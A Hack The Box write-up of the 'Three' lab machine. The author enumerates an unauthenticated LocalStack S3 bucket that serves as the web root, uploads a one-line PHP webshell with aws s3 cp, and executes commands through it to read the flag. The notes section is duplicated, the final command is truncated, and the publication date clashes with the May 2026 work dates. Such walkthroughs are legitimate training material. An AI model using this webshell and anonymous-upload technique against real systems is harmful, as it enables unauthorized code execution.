Machine / Machines

HTB Three

By Jennofrie Daguil ยท Cybersecurity and Red Team Operator

1. Discovered web app "The Toppers" on port 80 with domain thetoppers.htb 2. Identified S3-compatible service at s3.thetoppers.htb (LocalStack) 3. Listed S3 bucket thetoppers.htb โ€” found it's the web root (contains index.php) 4. Uploaded PHP webshell via AWS...

EasyPublished 2026-02-12Sanitized local writeup

Scenario

HTB Three attack path

Discovered web app "The Toppers" on port 80 with domain thetoppers.htb 2. Identified S3-compatible service at s3.thetoppers.htb (LocalStack) 3. Listed S3 bucket thetoppers.htb โ€” found it's the web root (contains index.php) 4. Uploaded PHP webshell via AWS...

Objective

Machine walkthrough focused on Machines evidence, validation, and reusable operator lessons.

HTB Three sanitized attack graph

Walkthrough flow

01

Web recon to found email to domain thetoppers.htb

02

Box name hint "Three" to tested s3.thetoppers.htb to...

03

aws s3 ls to bucket thetoppers.htb contains web root...

04

Uploaded PHP webshell via aws s3 cp with...

05

Executed webshell to RCE as www-data to read...

Source coverage

Moderate source coverage

Status: partial. This article is generated from 3 sanitized Markdown sources and keeps raw flags, credentials, keys, cookies, and reusable secrets out of the rendered blog.

76% coverage
Evidence verdict

Moderate confidence: the page is useful for review, but it should be treated as partial because the available source material is thinner or less narrative-complete.

  • <TARGET>-Three/walkthrough.md
  • HTB/<TARGET>-Three/notes.md
  • HTB/_knowledge/exports/ctf-lightrag-latest-203412/documents/machine__<TARGET>-Three__notes.md.a36035717c.md

Technical Walkthrough

HTB Three - Walkthrough

Target Info

  • IP: <TARGET>
  • OS: Linux (Ubuntu)
  • Difficulty: Easy (Starting Point)
  • Services: SSH (22), HTTP (80)
  • Flag: <hash redacted>

Attack Chain Summary

  1. Discovered web app "The Toppers" on port 80 with domain thetoppers.htb
  2. Identified S3-compatible service at s3.thetoppers.htb (LocalStack)
  3. Listed S3 bucket thetoppers.htb โ€” found it's the web root (contains index.php)
  4. Uploaded PHP webshell via AWS CLI to the S3 bucket
  5. Executed webshell to read flag at /var/www/flag.txt

Phase 1: Recon

Nmap

bash
nmap -sC -sV <TARGET>
text
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

Web Fingerprinting

  • Site title: "The Toppers" (band website)
  • Contact email: <email redacted> --> domain = thetoppers.htb
  • Server: Apache/2.4.29 (Ubuntu)

Vhost Discovery

Tested s3.thetoppers.htb based on box name hint ("Three" = S3):

bash
curl -sI http://s3.thetoppers.htb/
text
HTTP/1.1 404
Server: hypercorn-h11
Access-Control-Allow-Headers: ...x-amz-*...x-localstack-target...

Confirmed: LocalStack S3 service running as a vhost.

Phase 2: S3 Enumeration

List Buckets

bash
aws s3 ls --endpoint-url http://s3.thetoppers.htb --no-sign-request
text
2026-05-04 15:51:47 thetoppers.htb

List Bucket Contents

bash
aws s3 ls s3://thetoppers.htb --endpoint-url http://s3.thetoppers.htb --no-sign-request
text
PRE images/
2026-05-04 15:51:47          0 .htaccess
2026-05-04 15:51:47      11952 index.php

This is the web root served by Apache.

Phase 3: Exploitation

Upload PHP Webshell

bash
echo '<?php system($_GET["cmd"]); ?>' > /tmp/shell.php
aws s3 cp /tmp/shell.php s3://thetoppers.htb/shell.php --endpoint-url http://s3.thetoppers.htb --no-sign-request

Execute Webshell

bash
curl -s 'http://thetoppers.htb/shell.php?cmd=id'
# uid=33(www-data) gid=33(www-data) groups=33(www-data)

Capture Flag

bash
curl -s 'http://thetoppers.htb/shell.php?cmd=cat+/var/www/flag.txt'
# <hash redacted>

Key Takeaways

  1. Box name is always a hint on HTB Starting Point machines ("Three" = AWS S3)
  2. LocalStack is commonly used to emulate AWS services in CTFs
  3. --no-sign-request bypasses authentication on misconfigured S3 endpoints
  4. When an S3 bucket serves as a web root, uploading a webshell = RCE
  5. hypercorn-h11 server header + x-localstack-target header = LocalStack confirmation

/etc/hosts Entries Used

text
<TARGET> thetoppers.htb
<TARGET> s3.thetoppers.htb

Time to Solve

~5 minutes (from initial scan to flag capture)

Source-Backed Dossier

The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.

Notes

Scope

  • Target: <TARGET> (Three)
  • OS: Linux (Ubuntu)
  • Difficulty: Easy (Starting Point)
  • Attacker IP: <TARGET> (Pwnbox VPN)
  • Pwnbox SSH: x08@<TARGET>
  • Started: 2026-05-05
  • Completed: 2026-05-05

Status: PWNED

Flag

text
<hash redacted>

Services

PortServiceVersion
22SSHOpenSSH 7.6p1 Ubuntu 4ubuntu0.7
80HTTPApache 2.4.29 (Ubuntu)
80 (vhost)S3/LocalStackhypercorn-h11

Hostnames

  • thetoppers.htb (main web app)
  • s3.thetoppers.htb (LocalStack S3 endpoint)

Attack Path

  1. Web recon -> found email <email redacted> -> domain thetoppers.htb
  2. Box name hint "Three" -> tested s3.thetoppers.htb -> confirmed LocalStack S3
  3. aws s3 ls -> bucket thetoppers.htb contains web root (index.php)
  4. Uploaded PHP webshell via aws s3 cp with --no-sign-request
  5. Executed webshell -> RCE as www-data -> read /var/www/flag.txt

Command Log

bash
# Nmap
nmap -sC -sV <TARGET>

# Web recon
curl -s http://<TARGET>/ | grep -i '@'
# Found: <email redacted>

# S3 vhost confirmation
curl -sI http://s3.thetoppers.htb/
# Server: hypercorn-h11, x-amz headers present

# S3 enumeration
aws s3 ls --endpoint-url http://s3.thetoppers.htb --no-sign-request
aws s3 ls s3://thetoppers.htb --endpoint-url http://s3.thetoppers.htb --no-sign-request

# Webshell upload + execution
echo '<?php system($_GET["cmd"]); ?>' > /tmp/shell.php
aws s3 cp /tmp/shell.php s3://thetoppers.htb/shell.php --endpoint-url http://s3.thetoppers.htb --no-sign-request
curl -s 'http://thetoppers.htb/shell.php?cmd=cat+/var/www/flag.txt'

Notes

Scope

  • Target: <TARGET> (Three)
  • OS: Linux (Ubuntu)
  • Difficulty: Easy (Starting Point)
  • Attacker IP: <TARGET> (Pwnbox VPN)
  • Pwnbox SSH: x08@<TARGET>
  • Started: 2026-05-05
  • Completed: 2026-05-05

Status: PWNED

Flag

text
<<secret redacted>>

Services

PortServiceVersion
22SSHOpenSSH 7.6p1 Ubuntu 4ubuntu0.7
80HTTPApache 2.4.29 (Ubuntu)
80 (vhost)S3/LocalStackhypercorn-h11

Hostnames

  • thetoppers.htb (main web app)
  • s3.thetoppers.htb (LocalStack S3 endpoint)

Attack Path

  1. Web recon -> found email <email redacted> -> domain thetoppers.htb
  2. Box name hint "Three" -> tested s3.thetoppers.htb -> confirmed LocalStack S3
  3. aws s3 ls -> bucket thetoppers.htb contains web root (index.php)
  4. Uploaded PHP webshell via aws s3 cp with --no-sign-request
  5. Executed webshell -> RCE as www-data -> read /var/www/flag.txt

Command Log

bash
# Nmap
nmap -sC -sV <TARGET>

# Web recon
curl -s http://<TARGET>/ | grep -i '@'
# Found: <email redacted>

# S3 vhost confirmation
curl -sI http://s3.thetoppers.htb/
# Server: hypercorn-h11, x-amz headers present

# S3 enumeration
aws s3 ls --endpoint-url http://s3.thetoppers.htb --no-sign-request
aws s3 ls s3://thetoppers.htb --endpoint-url http://s3.thetoppers.htb --no-sign-request

# Webshell upload + execution
echo '<?php system($_GET["cmd"]); ?>' > /tmp/shell.php
aws s3 cp /tmp/shell.php s3://thetoppers.htb/shell.php --endpoint-url http://s3.thetoppers.htb --no-sign-request
curl -s 'http: <REDACTED>

Related insights

MachinesArchetype Walkthrough - HTB Starting PointMachinesBaseMachinesBase